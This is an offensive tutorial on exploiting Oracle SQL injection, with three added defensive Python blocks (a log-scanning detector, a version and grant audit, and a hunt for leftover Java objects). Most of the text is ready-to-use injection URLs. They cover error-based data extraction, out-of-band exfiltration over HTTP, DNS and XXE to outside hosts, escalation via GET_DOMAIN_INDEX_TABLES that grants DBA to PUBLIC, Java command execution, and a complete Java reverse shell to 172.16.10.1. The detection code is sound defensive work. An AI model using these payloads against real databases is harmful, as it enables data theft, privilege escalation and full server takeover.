Table of contents
  1. 1. Data retrieval
    1. 1.1. Several error-based injection methods
      1. 1.1.1. 0x1 utl_inaddr.get_host_name
      2. 1.1.2. 0x2 ctxsys.drithsx.sn
      3. 1.1.3. 0x3 XMLType
      4. 1.1.4. 0x4 dbms_xdb_version.checkin
      5. 1.1.5. 0x5 dbms_xdb_version.makeversioned
      6. 1.1.6. 0x6 dbms_xdb_version.uncheckout
      7. 1.1.7. 0x7 dbms_utility.sqlid_to_sqlhash
    2. 1.2. Using UTL_HTTP.request
    3. 1.3. UTL_INADDR.GET_HOST_ADDRESS & SYS.DBMS_LDAP.INIT
    4. 1.4. Oracle XXE (CVE-2014-6577)
  2. 2. Oracle privilege escalation vulnerability
    1. 2.1. GET_DOMAIN_INDEX_TABLES function injection vulnerability
      1. 2.1.1. Privilege escalation
      2. 2.1.2. Command execution
        1. 2.1.2.1. Create the Java code
        2. 2.1.2.2. Grant Java execution permission
        3. 2.1.2.3. Create the function
        4. 2.1.2.4. Grant execute on the function
        5. 2.1.2.5. Execute a command
      3. 2.1.3. Reverse shell
        1. 2.1.3.1. Create the Java code
        2. 2.1.3.2. Grant Java execution permission
        3. 2.1.3.3. Create the function
        4. 2.1.3.4. Grant execute on the function
        5. 2.1.3.5. Spawn the reverse shell

This article discusses what can be done once an Oracle injection point has been found: how to use Oracle's built-in functions, or flaws in them, to retrieve data, escalate privileges and finally obtain operating-system level access.

Data retrieval

Several error-based injection methods

0x1 utl_inaddr.get_host_name

This method needs no special privilege on Oracle 8i, 9i and 10g, but from Oracle 11g onward the access controls were tightened, so on 11g and later the current database user must hold network access privileges for this error-based technique to work.

http://www.iswin.org/oracle.jsp?name=' and 1=utl_inaddr.get_host_name((select user from dual))--

0x2 ctxsys.drithsx.sn

http://www.iswin.org/oracle.jsp?name=' and 1=ctxsys.drithsx.sn(1,(select user from dual))--

0x3 XMLType

When using XMLType for error-based injection, many people do not know why chr(60) is used. Looking at the ASCII table, 60 is '<', 58 is ':' and 62 is '>'. According to the relevant API documentation, XMLType parsing requires the input to start with '<' and end with '>', and the colon is also required here, although I could not find out why. Note also that if the returned data contains a space, the output is truncated at that point and the data comes back incomplete; wrapping the value in the replace function to substitute a non-whitespace character avoids this.

http://www.iswin.org/oracle.jsp?name=' and (select upper(XMLType(chr(60)||chr(58)||(select user from dual)||chr(62))) from dual) is not null--

0x4 dbms_xdb_version.checkin

http://www.iswin.org/oracle.jsp?name=' and (select dbms_xdb_version.checkin((select user from dual)) from dual) is not null--

0x5 dbms_xdb_version.makeversioned

http://www.iswin.org/oracle.jsp?name=' and (select dbms_xdb_version.makeversioned((select user from dual)) from dual) is not null--

0x6 dbms_xdb_version.uncheckout

http://www.iswin.org/oracle.jsp?name=' and (select dbms_xdb_version.uncheckout((select user from dual)) from dual) is not null--

0x7 dbms_utility.sqlid_to_sqlhash

http://www.iswin.org/oracle.jsp?name=' and (SELECT dbms_utility.sqlid_to_sqlhash((select user from dual)) from dual) is not null--

Using UTL_HTTP.request

With utl_http.request we can send query results to a remote server, which is very useful for blind injection; the database user needs the utl_http network access privilege for this to work.

http://www.iswin.org/oracle.jsp?name=' and (UTL_HTTP.request('http://www.iswin.org:80/'||(select banner from sys.v_$version where rownum=1))=1

UTL_INADDR.GET_HOST_ADDRESS & SYS.DBMS_LDAP.INIT

The database server is often separated from the web server and may have no outbound internet access, but DNS requests are sometimes still allowed, so this method works in some of those situations.

http://www.iswin.org/oracle.jsp?name=' and (select utl_inaddr.get_host_address((select user from dual)||'.iswin.org') from dual)is not null--

http://www.iswin.org/oracle.jsp?name=' and (select SYS.DBMS_LDAP.INIT((select user from dual)||'.iswin.org') from dual)is not null--

Oracle XXE (CVE-2014-6577)

Affected versions: 11.2.0.3, 11.2.0.4, 12.1.0.1 and 12.1.0.2

The effect of this Oracle XXE is much like UTL_HTTP: both transmit data to a remote server. However, because extractvalue() is available to every database user there is no privilege problem, so when a low-privileged user has no UTL_HTTP access this is a good alternative.

http://www.iswin.org/oracle.jsp?name=' and (select extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://172.16.10.1:8080/'||(SELECT user from dual)||'"> %remote;]>'),'/l') from dual) is not null
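As an added example (not part of the original article), the following Python scans web-server access-log lines for the Oracle package and function names used by the error-based and out-of-band techniques above (sections 1.1 to 1.4), so that a defender can spot probing of an injectable parameter. The request is URL-decoded twice and lowercased before matching, because the payloads arrive encoded and case varies. The log lines, client addresses and the attacker.example host are constructed for this example; the rule names and the function names are my own.

```python
import re
from urllib.parse import unquote_plus

# Signatures of the Oracle functions/packages used in the error-based and
# out-of-band techniques described above. Matched on decoded, lowercased text.
ORACLE_INJECTION_RULES = {
    "error-based: utl_inaddr": re.compile(r"utl_inaddr\.get_host_name\s*\("),
    "error-based: ctxsys.drithsx.sn": re.compile(r"ctxsys\.drithsx\.sn\s*\("),
    "error-based: xmltype": re.compile(r"xmltype\s*\(\s*chr\s*\(\s*60\s*\)"),
    "error-based: dbms_xdb_version": re.compile(
        r"dbms_xdb_version\.(checkin|makeversioned|uncheckout)\s*\("),
    "error-based: sqlid_to_sqlhash": re.compile(r"dbms_utility\.sqlid_to_sqlhash\s*\("),
    "oob-http: utl_http.request": re.compile(r"utl_http\.request\s*\("),
    "oob-dns: utl_inaddr.get_host_address": re.compile(r"utl_inaddr\.get_host_address\s*\("),
    "oob-dns: dbms_ldap.init": re.compile(r"dbms_ldap\.init\s*\("),
    "xxe: extractvalue with external entity": re.compile(r"extractvalue\s*\(.*<!entity\s+%"),
}

# Combined Log Format: client ident user [time] "METHOD PATH PROTO" status bytes
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')

def normalise_request(raw_path):
    """Decode the request target so encoded payloads (%27, %20, +) become visible.
    Decoding twice catches double-encoded query strings as well."""
    return unquote_plus(unquote_plus(raw_path)).lower()

def scan_request(raw_path):
    """Names of the rules that match one request target (empty list if clean)."""
    text = normalise_request(raw_path)
    return [name for name, rx in ORACLE_INJECTION_RULES.items() if rx.search(text)]

def scan_access_log(lines):
    """Return (client, status, matched_rules) for every suspicious log line."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        client, _ts, _method, path, status = m.groups()
        rules = scan_request(path)
        if rules:
            hits.append((client, int(status), rules))
    return hits

# Constructed sample log: one benign request, then three probes in the style
# of the payloads above against the same parameter.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Oct/2015:13:55:36 +0800] "GET /oracle.jsp?name=alice HTTP/1.1" 200 512',
    '10.0.0.9 - - [10/Oct/2015:13:55:40 +0800] "GET /oracle.jsp?name=%27%20and%201%3Dutl_inaddr.get_host_name((select%20user%20from%20dual))-- HTTP/1.1" 500 214',
    '10.0.0.9 - - [10/Oct/2015:13:55:41 +0800] "GET /oracle.jsp?name=%27%20and%20(select%20upper(XMLType(chr(60)%7C%7Cchr(58)%7C%7C(select%20user%20from%20dual)%7C%7Cchr(62)))%20from%20dual)%20is%20not%20null-- HTTP/1.1" 500 230',
    '10.0.0.9 - - [10/Oct/2015:13:55:45 +0800] "GET /oracle.jsp?name=%27%20and%20(select%20SYS.DBMS_LDAP.INIT((select%20user%20from%20dual)%7C%7C%27.attacker.example%27)%20from%20dual)is%20not%20null-- HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for client, status, rules in scan_access_log(SAMPLE_LOG):
        print(f"{client} status={status} rules={rules}")
```

A matched request that also produced an HTTP 500 corroborates error-based probing (the injected function raised an ORA- error that the page turned into a server error), while the DNS and HTTP out-of-band variants typically return 200 and are better confirmed from DNS resolver or egress proxy logs of the database host.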

Oracle privilege escalation vulnerability

GET_DOMAIN_INDEX_TABLES function injection vulnerability

Affected versions: Oracle 8.1.7.4, 9.2.0.1 - 9.2.0.7, 10.1.0.2 - 10.1.0.4, 10.2.0.1 - 10.2.0.2

The root cause is that the function's parameters are injectable and the function is owned by SYS, so injecting into it executes arbitrary SQL with SYS's privileges. Because execute on the function is granted to PUBLIC, almost any Oracle injection point on a version with this flaw can be escalated to the highest privilege level.
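Added example, not from the original article: a small Python audit that checks whether an instance falls inside the affected version ranges stated on this page (both the GET_DOMAIN_INDEX_TABLES ranges just listed and the CVE-2014-6577 versions from section 1.4), and whether the preconditions the techniques rely on are present, namely EXECUTE on the relevant SYS packages granted to PUBLIC and, as the end state the escalation payload below leaves behind, the DBA role granted to PUBLIC. The rows are constructed samples in the shape of DBA_TAB_PRIVS and DBA_ROLE_PRIVS; the Grant class, the RISKY_PACKAGES set and the function names are my own.

```python
from dataclasses import dataclass

# Affected versions exactly as listed in the article (inclusive ranges,
# compared on the first four version components).
AFFECTED = {
    "DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES injection": [
        ((8, 1, 7, 4), (8, 1, 7, 4)),
        ((9, 2, 0, 1), (9, 2, 0, 7)),
        ((10, 1, 0, 2), (10, 1, 0, 4)),
        ((10, 2, 0, 1), (10, 2, 0, 2)),
    ],
    "CVE-2014-6577 (XXE via extractvalue)": [
        ((11, 2, 0, 3), (11, 2, 0, 4)),
        ((12, 1, 0, 1), (12, 1, 0, 2)),
    ],
}

# SYS packages whose EXECUTE grant to PUBLIC enables the techniques above
# (error-based, out-of-band, escalation and the Java permission grants).
RISKY_PACKAGES = {"DBMS_EXPORT_EXTENSION", "UTL_HTTP", "UTL_INADDR",
                  "DBMS_LDAP", "DBMS_JAVA"}

def parse_version(s):
    """'10.2.0.1.0' -> (10, 2, 0, 1); missing components are padded with 0."""
    parts = tuple(int(p) for p in s.strip().split(".")[:4])
    return parts + (0,) * (4 - len(parts))

def affected_issues(version_string):
    """Names of the issues whose affected range contains this version."""
    v = parse_version(version_string)
    return [name for name, ranges in AFFECTED.items()
            if any(lo <= v <= hi for lo, hi in ranges)]

@dataclass(frozen=True)
class Grant:
    """One DBA_TAB_PRIVS row (column subset)."""
    grantee: str
    owner: str
    object_name: str
    privilege: str

def public_execute_on_risky(grants):
    """Risky SYS packages on which PUBLIC holds EXECUTE, sorted by name."""
    return sorted(g.object_name for g in grants
                  if g.grantee == "PUBLIC" and g.owner == "SYS"
                  and g.privilege == "EXECUTE" and g.object_name in RISKY_PACKAGES)

def dba_to_public(role_grants):
    """role_grants: (grantee, granted_role) pairs from DBA_ROLE_PRIVS."""
    return any(grantee == "PUBLIC" and role == "DBA" for grantee, role in role_grants)

def audit(version_string, tab_privs, role_privs):
    findings = []
    for issue in affected_issues(version_string):
        findings.append(f"version {version_string} is in the affected range for {issue}")
    for pkg in public_execute_on_risky(tab_privs):
        findings.append(f"EXECUTE on SYS.{pkg} is granted to PUBLIC; revoke it "
                        f"or limit it with a network ACL where the package needs one")
    if dba_to_public(role_privs):
        findings.append("role DBA is granted to PUBLIC: the state the escalation "
                        "payload leaves behind, revoke and investigate")
    return findings

# Constructed sample rows (not taken from any real instance).
SAMPLE_TAB_PRIVS = [
    Grant("PUBLIC", "SYS", "DBMS_EXPORT_EXTENSION", "EXECUTE"),
    Grant("PUBLIC", "SYS", "UTL_HTTP", "EXECUTE"),
    Grant("PUBLIC", "SYS", "DBMS_OUTPUT", "EXECUTE"),
    Grant("APPUSER", "SYS", "UTL_INADDR", "EXECUTE"),
]
SAMPLE_ROLE_PRIVS = [("APPUSER", "CONNECT"), ("PUBLIC", "DBA")]

if __name__ == "__main__":
    for line in audit("10.2.0.1.0", SAMPLE_TAB_PRIVS, SAMPLE_ROLE_PRIVS):
        print(line)
```

The inputs come from three standard queries: `SELECT version FROM v$instance`, `SELECT grantee, owner, table_name, privilege FROM dba_tab_privs WHERE grantee = 'PUBLIC'` (table_name maps to object_name above) and `SELECT grantee, granted_role FROM dba_role_privs`. A version inside the affected range means the vendor patch is missing; the PUBLIC grants are the part a DBA can tighten immediately on any version.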

Privilege escalation

http://www.iswin.org/oracle.jsp?name=' and (SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant dba to public'''';END;'';END;--','SYS',0,'1',0)) is not null--

Once privileges have been escalated there is a lot that can be done; because Oracle can execute Java code, what you do after escalation depends on your own Java skills.
A few common approaches are given here.

Command execution

Create the Java code

http://www.iswin.org/oracle.jsp?name=' and (select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''create or replace and compile java source named "Command" as import java.io.*;public class Command{public static String exec(String cmd) throws Exception{String sb="";BufferedInputStream in = new BufferedInputStream(Runtime.getRuntime().exec(cmd).getInputStream());BufferedReader inBr = new BufferedReader(new InputStreamReader(in));String lineStr;while ((lineStr = inBr.readLine()) != null)sb+=lineStr+"\n";inBr.close();in.close();return sb;}}'''';END;'';END;--','SYS',0,'1',0) from dual) is not null

Grant Java execution permission

http://www.iswin.org/oracle.jsp?name=' and (select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual) is not null--

Create the function

http://www.iswin.org/oracle.jsp?name=' and (select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''create or replace function cmd(p_cmd in varchar2) return varchar2 as language java name ''''''''Command.exec(java.lang.String) return String''''''''; '''';END;'';END;--','SYS',0,'1',0) from dual) is not null--

Grant execute on the function

http://www.iswin.org/oracle.jsp?name=' and (select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on cmd to public'''';END;'';END;--','SYS',0,'1',0) from dual) is not null--

Execute a command

http://www.iswin.org/oracle.jsp?name=' and (select sys.cmd('cmd.exe /c whoami') from dual) is not null--

Reverse shell

Create the Java code

When plain command execution is not much help, we can get an interactive reverse shell instead, which is far more convenient.

http://www.iswin.org/oracle.jsp?name=' and (select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''create or replace and compile java source named "shell" as import java.io.*;import java.net.*;public class shell{public static void run() throws Exception {Socket s = new Socket("172.16.10.1", 80);Process p = Runtime.getRuntime().exec("cmd.exe");new T(p.getInputStream(), s.getOutputStream()).start();new T(p.getErrorStream(), s.getOutputStream()).start();new T(s.getInputStream(), p.getOutputStream()).start();}static class T extends Thread {private InputStream i;private OutputStream u;public T(InputStream in, OutputStream out) {this.u = out;this.i = in;}public void run() {BufferedReader n = new BufferedReader(new InputStreamReader(i));BufferedWriter w = new BufferedWriter(new OutputStreamWriter(u));char f[] = new char[8192];int l;try {while ((l = n.read(f, 0, f.length)) > 0) {w.write(f, 0, l);w.flush();}} catch (IOException e) {}try {if (n != null)n.close();if (w != null)w.close();} catch (Exception e) {}}}}'''';END;'';END;--','SYS',0,'1',0) from dual) is not null--

Grant Java execution permission

http://www.iswin.org/oracle.jsp?name=' and (select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.net.SocketPermission'''''''', ''''''''<>'''''''', ''''''''*'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual) is not null--

Create the function

http://www.iswin.org/oracle.jsp?name=' and (select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''create or replace function reversetcp RETURN VARCHAR2 as language java name ''''''''shell.run() return String''''''''; '''';END;'';END;--','SYS',0,'1',0) from dual) is not null--

Grant execute on the function

http://www.iswin.org/oracle.jsp?name=' and (select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on reversetcp to public'''';END;'';END;--','SYS',0,'1',0) from dual) is not null--

Spawn the reverse shell

http://www.iswin.org/oracle.jsp?name=' and (select sys.reversetcp from dual) is not null--
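Added example, not from the original article: a Python hunt for the artifacts that the command-execution and reverse-shell chains above leave in the data dictionary. Both chains grant PUBLIC a broad Java permission (java.io.FilePermission on <<ALL FILES>>, java.net.SocketPermission on every host) and create a SYS-owned Java source plus a SYS-owned wrapper function, so the check looks at DBA_JAVA_POLICY for such grants and at DBA_OBJECTS for SYS objects created after the last known patch date. The row shapes, object names, timestamps and baseline date are constructed for this example; treating "*" as the SocketPermission target the chain grants is my assumption, since the article's payload does not show the target clearly.

```python
from dataclasses import dataclass
from datetime import datetime

@dataclass(frozen=True)
class JavaPolicyRow:
    """One row of DBA_JAVA_POLICY (column subset, constructed for this example)."""
    kind: str         # 'GRANT' or 'RESTRICT'
    grantee: str
    type_name: str    # permission class, e.g. java.io.FilePermission
    name: str         # permission target
    action: str
    enabled: str      # 'ENABLED' or 'DISABLED'

@dataclass(frozen=True)
class ObjectRow:
    """One row of DBA_OBJECTS (column subset, constructed for this example)."""
    owner: str
    object_name: str
    object_type: str
    created: datetime

def is_broad_permission(row):
    """True for an all-files or all-hosts target. The '*' wildcard host for
    SocketPermission is an assumption about what the grant above targets."""
    if row.type_name == "java.io.FilePermission":
        return row.name == "<<ALL FILES>>"
    if row.type_name == "java.net.SocketPermission":
        return row.name.startswith("*")
    return False

def broad_public_java_grants(policy_rows):
    """Active GRANT rows that give PUBLIC a broad file or socket permission."""
    return [r for r in policy_rows
            if r.kind == "GRANT" and r.grantee == "PUBLIC"
            and r.enabled == "ENABLED" and is_broad_permission(r)]

HUNTED_TYPES = ("JAVA SOURCE", "JAVA CLASS", "FUNCTION")

def sys_objects_after(object_rows, baseline):
    """SYS-owned Java sources/classes and functions created after the patch
    baseline. A clean SYS schema only gains such objects through patching."""
    return [r for r in object_rows
            if r.owner == "SYS" and r.object_type in HUNTED_TYPES
            and r.created > baseline]

def hunt(policy_rows, object_rows, baseline):
    findings = []
    for r in broad_public_java_grants(policy_rows):
        findings.append(f"PUBLIC holds {r.type_name} '{r.name}' ({r.action}); "
                        f"revoke with dbms_java.revoke_permission and find who granted it")
    for r in sys_objects_after(object_rows, baseline):
        findings.append(f"SYS.{r.object_name} ({r.object_type}) created "
                        f"{r.created:%Y-%m-%d %H:%M}, after the patch baseline")
    return findings

# Constructed sample rows mirroring what the two chains above would create.
SAMPLE_POLICY = [
    JavaPolicyRow("GRANT", "PUBLIC", "java.io.FilePermission", "<<ALL FILES>>", "execute", "ENABLED"),
    JavaPolicyRow("GRANT", "PUBLIC", "java.net.SocketPermission", "*", "connect,resolve", "ENABLED"),
    JavaPolicyRow("GRANT", "APPUSER", "java.io.FilePermission", "/tmp/app.log", "read", "ENABLED"),
    JavaPolicyRow("RESTRICT", "PUBLIC", "java.io.FilePermission", "<<ALL FILES>>", "execute", "ENABLED"),
]
BASELINE = datetime(2015, 1, 15)   # date of the last applied patch set, constructed
SAMPLE_OBJECTS = [
    ObjectRow("SYS", "DBMS_OUTPUT", "PACKAGE", datetime(2014, 6, 1)),
    ObjectRow("SYS", "Command", "JAVA SOURCE", datetime(2015, 10, 10, 13, 55)),
    ObjectRow("SYS", "CMD", "FUNCTION", datetime(2015, 10, 10, 13, 56)),
    ObjectRow("APPUSER", "ORDERS", "TABLE", datetime(2015, 10, 10)),
]

if __name__ == "__main__":
    for line in hunt(SAMPLE_POLICY, SAMPLE_OBJECTS, BASELINE):
        print(line)
```

The policy rows come from `SELECT kind, grantee, type_name, name, action, enabled FROM dba_java_policy`, the object rows from `SELECT owner, object_name, object_type, created FROM dba_objects WHERE owner = 'SYS'`. Object names are case-sensitive in the hunt on purpose: a quoted lower-case or mixed-case name like "Command" under SYS is itself unusual and worth a look.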